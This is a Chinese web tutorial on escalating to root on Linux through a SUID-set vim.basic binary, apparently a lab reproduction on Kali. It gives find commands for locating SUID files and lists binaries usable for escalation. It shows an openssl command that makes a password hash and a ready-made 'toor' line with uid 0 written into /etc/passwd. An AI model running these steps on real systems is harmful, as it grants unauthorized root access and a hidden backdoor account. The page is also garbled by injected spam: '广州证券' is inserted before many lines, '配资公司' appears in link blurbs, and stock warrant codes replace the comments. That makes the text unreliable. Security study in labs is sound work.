广州证券

Linux使用suid vim.basic文件实现提权

 更新时间:2020年07月31日 08:53:50   转载 作者:This_is_Y  
这篇文章主要介绍了Linux使用suid vim.basic文件实现提权,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下

在kali上复现

广州证券先给需要的vim.basic文件设置suid权限

chmod u+s /usr/bin/vim.basic

先adduser test1一个普通权限用户

广州证券现在就是一个合适的提权环境

通过以下命令可以找到存在suid权限的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
广州证券 find / -user root -perm -4000 -exec ls -ldb {} \;

可用于提权的文件有

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户

passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell

广州证券这边可以看看root用户的格式

广州证券root:x:0:0:root:/root:/bin/bash

(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)

生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)

直接写在passwd文件里面,

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

广州证券用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个

广州证券这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改

vim.basic /etc/passwd

广州证券用这个打开,然后修改文件,就可以成功保存

可以看到已经添加了,su toor切换,密码123,再id查看一下权限

root权限

广州证券chmod u+s /usr/bin/vim.basic

广州证券以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持脚本之家。

广州证券相关的文章

  • Linux工具之Nethogs按进程监控网络带宽的安装部署

    Linux工具之Nethogs按进程监控网络带宽的安装部署

    NetHogs是一个小型的net top工具,不像大多数工具那样拖慢每个协议或者是每个子网的速度而是按照进程进行带宽分组,这篇文章主要介绍了Linux工具Nethogs按进程监控网络带宽,值得收藏,需要的朋友可以参考下
    2019-07-07
  • centos7安装nginx的两种方法介绍

    centos7安装nginx的两种方法介绍

    本篇文章主要介绍了centos7安装nginx的两种方法介绍,主要是通过两种方式进行安装,有兴趣的可以了解一下。
    2017-03-03
  • linux系统下定时执行php脚本的方法

    linux系统下定时执行php脚本的方法

    网站运营过程中,经常会遇到需要定时执行php脚本的情况,下面这篇文章主要介绍了linux系统下定时执行php脚本的方法,需要的朋友可以参考借鉴,下面来一起看看吧。
    2017-01-01
  • Linux 服务器安全配置

    Linux 服务器安全配置

    Linux 服务器安全配置,需要的朋友可以参考下
    2012-03-03
  • Linux设置虚拟内存的教学与实战教程

    Linux设置虚拟内存的教学与实战教程

    这篇文章主要给大家介绍了配资公司 Linux设置虚拟内存教学与实战的相关资料,文中通过示例代码以及图文介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
    2019-03-03
  • linux中启动tomcat后浏览器无法访问的解决方法

    linux中启动tomcat后浏览器无法访问的解决方法

    最近在启动了tomcat后发现了一些问题,通过查找相关资料终于解决了,下面将解决方法分享给大家,这篇文章主要给大家介绍了配资公司 linux中启动tomcat后浏览器无法访问的解决方法,需要的朋友可以参考下。
    2017-12-12
  • Linux 中的文件复制cp命令和scp命令详解

    Linux 中的文件复制cp命令和scp命令详解

    这篇文章主要介绍了Linux 中的文件复制cp命令和scp命令详解的相关资料,需要的朋友可以参考下
    2017-03-03
  • 利用.htaccess的Rewrite规则实现Discuz论坛的伪静态链接

    利用.htaccess的Rewrite规则实现Discuz论坛的伪静态链接

    重新开放了Minidx帮助论坛,虽然目前没什么内容,不过顺便想SEO一下,实现伪静态链接。
    2010-12-12
  • 详解firewall的规则设置与命令(白名单设置)

    详解firewall的规则设置与命令(白名单设置)

    这篇文章主要介绍了详解firewall的规则设置与命令(白名单设置),文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2019-11-11
  • Linux一个增强的截图及分享工具:ScreenCloud

    Linux一个增强的截图及分享工具:ScreenCloud

    今天小编就为大家分享一篇配资公司 Linux一个增强的截图及分享工具:ScreenCloud,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
    2018-10-10

最新评论

深高CWB1(580014)

上汽CWB1(580016)

赣粤CWB1(580017)

石化CWB1(580019)

上港CWB1(580020)

青啤CWB1(580021)

国电CWB1(580022)

康美CWB1(580023)

宝钢CWB1(580024)

葛洲CWB1(580025)